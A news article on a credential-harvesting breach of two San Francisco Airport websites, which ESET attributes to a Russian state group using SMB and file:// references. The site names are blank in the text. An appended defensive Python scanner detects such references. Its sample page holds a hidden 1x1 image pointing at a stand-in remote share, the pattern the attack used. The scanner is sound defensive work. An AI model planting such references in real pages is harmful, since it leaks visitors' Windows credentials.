State-sponsored Russian actors said to have taken off with sensitive user data

San Francisco International Airport (SFO) has warned that a breach against two of its websites may have allowed attackers to harvest visiting users’ Windows login credentials.

Malicious code was planted last month on two sites – and – as the result of a cyber-attack by unidentified (or at least unnamed) assailants, the airport admitted late last week.

“The attackers inserted malicious computer code on these websites to steal some users’ login credentials,” a breach notice from SFO explains.

“Users possibly impacted by this attack include those accessing these websites from outside the airport network through Internet Explorer on a Windows-based personal device or a device not maintained by SFO.”

“It appears the attackers may have accessed the impacted users’ usernames and passwords used to log on to those personal devices,” it added.

Fly-by-night attack

In response to the incident, SFO took down the two affected websites before scrubbing them clean of malicious code.

The website has been restored, while the site, which contains a front page link to the breach notice, is described as being “under maintenance”.

A holding page on the site offers advice on how to get more information on SFO construction projects, bids, and contracts elsewhere on the web.

The airport – which handled more than 57 million passengers last year, making it the seventh busiest in the US – reset all SFO-related email and network passwords late last month, around two weeks before publicly disclosing the breach.

External users who visited the site are advised to reset their Windows device login credentials, as applicable.

Any credentials that use the same username and password combination – a bad practice many nonetheless persist with – also need to be changed.

Security software firm ESET notes that the tactics in play during the attack match those of a threat group known as Dragonfly/Energetic Bear, a Russian state-sponsored hacking crew.

“The intent was to collect Windows credentials (username/NTLM hash) of visitors by exploiting an SMB feature and the file:// prefix,” ESET Research said in a post on Twitter.

“Contrary to what several people reported, ESET Research assesses that this attack has no link with any Magecart credential stealer.

“The targeted information was NOT the visitor’s credentials to the compromised websites, but rather the visitor's own Windows credentials.”
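A defender-side check for the technique ESET describes, as an added example that is not from the original article, SFO or ESET: it scans a page's HTML for resource references that use a `file://` URL or UNC path naming a remote host, the kind of reference that makes a Windows client attempt SMB authentication. The sample markup, the host `files.example.net` and the function names are constructed for illustration.

```python
from html.parser import HTMLParser

# Attributes that make a browser fetch or navigate to a resource (not exhaustive).
URL_ATTRS = {"src", "href", "data", "poster", "background", "action"}

def remote_file_host(value):
    """Return the remote host a file:// or UNC reference names, else None."""
    v = value.strip()
    if v.startswith("\\\\"):                        # UNC path: \\host\share\...
        host = v[2:].replace("\\", "/").split("/")[0]
    elif v.lower().startswith("file:"):
        rest = v[5:].replace("\\", "/")
        slashes = len(rest) - len(rest.lstrip("/"))
        if slashes == 3 or slashes < 2:             # file:///C:/... is a local path
            return None
        host = rest.lstrip("/").split("/")[0]       # file://host/... or file:////host/...
    else:
        return None                                 # includes //cdn.example.com/x.js
    host = host.lower()
    if host in ("", "localhost", "127.0.0.1") or host.endswith((":", "|")):
        return None                                 # loopback or a drive letter
    return host

class _Finder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            host = remote_file_host(value) if name in URL_ATTRS and value else None
            if host:
                self.findings.append((self.getpos()[0], tag, name, host))

def scan_html(html):
    # Returns a list of (line, tag, attribute, remote_host) tuples.
    finder = _Finder()
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample page: two suspicious references, three benign ones.
SAMPLE = r"""<html><body>
<img src="/img/logo.png">
<script src="//cdn.example.com/app.js"></script>
<img src="file://files.example.net/share/pixel.png" width="1" height="1">
<a href="file:///C:/docs/readme.txt">local</a>
<img src="\\files.example.net\share\icon.png">
</body></html>"""

if __name__ == "__main__":
    print(scan_html(SAMPLE))
```

Run against a known-good copy of each published page as part of integrity monitoring; any hit on a public-facing site deserves review, since legitimate web content rarely references remote file shares.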
